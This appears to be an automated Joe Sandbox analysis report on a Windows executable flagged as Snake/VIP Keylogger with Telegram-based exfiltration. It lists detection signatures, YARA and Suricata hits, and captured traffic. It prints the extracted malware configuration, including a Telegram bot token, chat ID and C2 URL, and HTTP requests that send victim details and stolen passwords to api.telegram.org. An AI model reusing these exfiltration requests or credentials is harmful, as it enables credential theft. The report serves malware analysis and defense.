Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
19d6P55zd1.exe

Overview

General Information

Sample name:19d6P55zd1.exe
renamed because original name is a hash value
Original sample name:9843d3697d4998e63df6e33939a163e4ebe4f3a8f50f292508992b16680950e5.exe
Analysis ID:1588019
MD5:13e4d4a655db53282e89478eb1fdd462
SHA1:1b72c5e4e03807aa857f095db92a76e36fd2b0cd
SHA256:9843d3697d4998e63df6e33939a163e4ebe4f3a8f50f292508992b16680950e5
Tags:exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 19d6P55zd1.exe (PID: 4340 cmdline: "C:\Users\user\Desktop\19d6P55zd1.exe" MD5: 13E4D4A655DB53282E89478EB1FDD462)
    • RegSvcs.exe (PID: 1340 cmdline: "C:\Users\user\Desktop\19d6P55zd1.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE/sendMessage"}

Threatname: VIP Keylogger

{"Exfil Mode": "Telegram", "Bot Token": "7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE", "Chat id": "2146433139", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE", "Chat_id": "2146433139", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000002.00000002.4601945370.0000000000402000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2d53d:$a1: get_encryptedPassword
          • 0x2d84a:$a2: get_encryptedUsername
          • 0x2d35b:$a3: get_timePasswordChanged
          • 0x2d456:$a4: get_passwordField
          • 0x2d553:$a5: set_encryptedPassword
          • 0x2ebec:$a7: get_logins
          • 0x2eb4f:$a10: KeyLoggerEventArgs
          • 0x2e7b4:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 17 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  2.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2d73d:$a1: get_encryptedPassword
                  • 0x2da4a:$a2: get_encryptedUsername
                  • 0x2d55b:$a3: get_timePasswordChanged
                  • 0x2d656:$a4: get_passwordField
                  • 0x2d753:$a5: set_encryptedPassword
                  • 0x2edec:$a7: get_logins
                  • 0x2ed4f:$a10: KeyLoggerEventArgs
                  • 0x2e9b4:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 15 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T20:37:44.567549+010028033053Unknown Traffic192.168.2.649712104.21.112.1443TCP
                  2025-01-10T20:37:45.923744+010028033053Unknown Traffic192.168.2.649715104.21.112.1443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T20:37:43.004704+010028032742Potentially Bad Traffic192.168.2.649710132.226.247.7380TCP
                  2025-01-10T20:37:43.973459+010028032742Potentially Bad Traffic192.168.2.649710132.226.247.7380TCP
                  2025-01-10T20:37:45.301557+010028032742Potentially Bad Traffic192.168.2.649714132.226.247.7380TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T20:38:01.291299+010018100081Potentially Bad Traffic192.168.2.649830149.154.167.220443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-01-10T20:37:54.985464+010018100071Potentially Bad Traffic192.168.2.649787149.154.167.220443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000002.00000002.4603067666.00000000030C1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE", "Chat_id": "2146433139", "Version": "4.4"}
                  Source: 2.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE", "Chat id": "2146433139", "Version": "4.4"}
                  Source: RegSvcs.exe.1340.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE/sendMessage"}
                  Multi AV Scanner detection for submitted file
                  Source: 19d6P55zd1.exeVirustotal: Detection: 69%Perma Link
                  Source: 19d6P55zd1.exeReversingLabs: Detection: 76%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for sample
                  Source: 19d6P55zd1.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: 19d6P55zd1.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49711 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49787 version: TLS 1.2
                  Source: Binary string: wntdll.pdbUGP source: 19d6P55zd1.exe, 00000000.00000003.2163750749.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, 19d6P55zd1.exe, 00000000.00000003.2162644338.00000000038F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: 19d6P55zd1.exe, 00000000.00000003.2163750749.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, 19d6P55zd1.exe, 00000000.00000003.2162644338.00000000038F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0038445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0038445A
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0038C6D1 FindFirstFileW,FindClose,0_2_0038C6D1
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0038C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0038C75C
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0038EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0038EF95
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0038F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0038F0F2
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0038F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0038F3F3
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003837EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003837EF
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_00383B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00383B12
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_0038BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0038BCBC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0156F8E9h2_2_0156F631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0156FD41h2_2_0156FA88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B564E0h2_2_05B561E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5F450h2_2_05B5F158
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B53076h2_2_05B52DA8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B55066h2_2_05B54D98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B510BEh2_2_05B50DF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B57800h2_2_05B57508
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5D7A0h2_2_05B5D4A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5EF88h2_2_05B5EC90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B52756h2_2_05B52488
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B58FE8h2_2_05B58CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5079Eh2_2_05B504D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5A7D0h2_2_05B5A4D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5BFB8h2_2_05B5BCC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B54747h2_2_05B54478
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B522C6h2_2_05B51FF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5BAF0h2_2_05B5B7F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5D2D8h2_2_05B5CFE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B542B6h2_2_05B53FE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5EAC0h2_2_05B5E7C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B519B7h2_2_05B51710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B569A8h2_2_05B566B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B55986h2_2_05B556B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B58190h2_2_05B57E98
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B59978h2_2_05B59680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B53996h2_2_05B536C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5E130h2_2_05B5DE38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5F918h2_2_05B5F620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5B160h2_2_05B5AE68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5C948h2_2_05B5C650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B594B0h2_2_05B591B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5AC98h2_2_05B5A9A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5C480h2_2_05B5C188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B57CC8h2_2_05B579D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B52BE6h2_2_05B52918
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B54BD6h2_2_05B54908
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5DC68h2_2_05B5D970
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B50C2Eh2_2_05B50960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B58B20h2_2_05B58828
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5A308h2_2_05B5A010
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5030Eh2_2_05B50040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B57338h2_2_05B57040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5B628h2_2_05B5B330
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5CE10h2_2_05B5CB18
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5E5F8h2_2_05B5E300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B56E70h2_2_05B56B78
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B58658h2_2_05B58360
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B51E36h2_2_05B51B68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B53E26h2_2_05B53B58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B55EB7h2_2_05B55B48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B59E40h2_2_05B59B48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5154Eh2_2_05B51280
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B5FDE0h2_2_05B5FAE8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B53506h2_2_05B53238
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 05B554F6h2_2_05B55228

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49830 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49787 -> 149.154.167.220:443
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.19d6P55zd1.exe.1e90000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.2166172268.0000000001E90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2011/01/2025%20/%2003:42:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7735874420:AAHB5lmusBq4MdXRakEVmgMVQ6wUkxr5YLE/sendDocument?chat_id=2146433139&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd32545f3d1fd1Host: api.telegram.orgContent-Length: 584
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                  Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49710 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49714 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49715 -> 104.21.112.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49712 -> 104.21.112.1:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.6:49711 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\19d6P55zd1.exeCode function: 0_2_003922EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_003922EE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:066656%0D%0ADate%20and%20Time:%2011/01/2025%20/%2003:42:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20066656%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
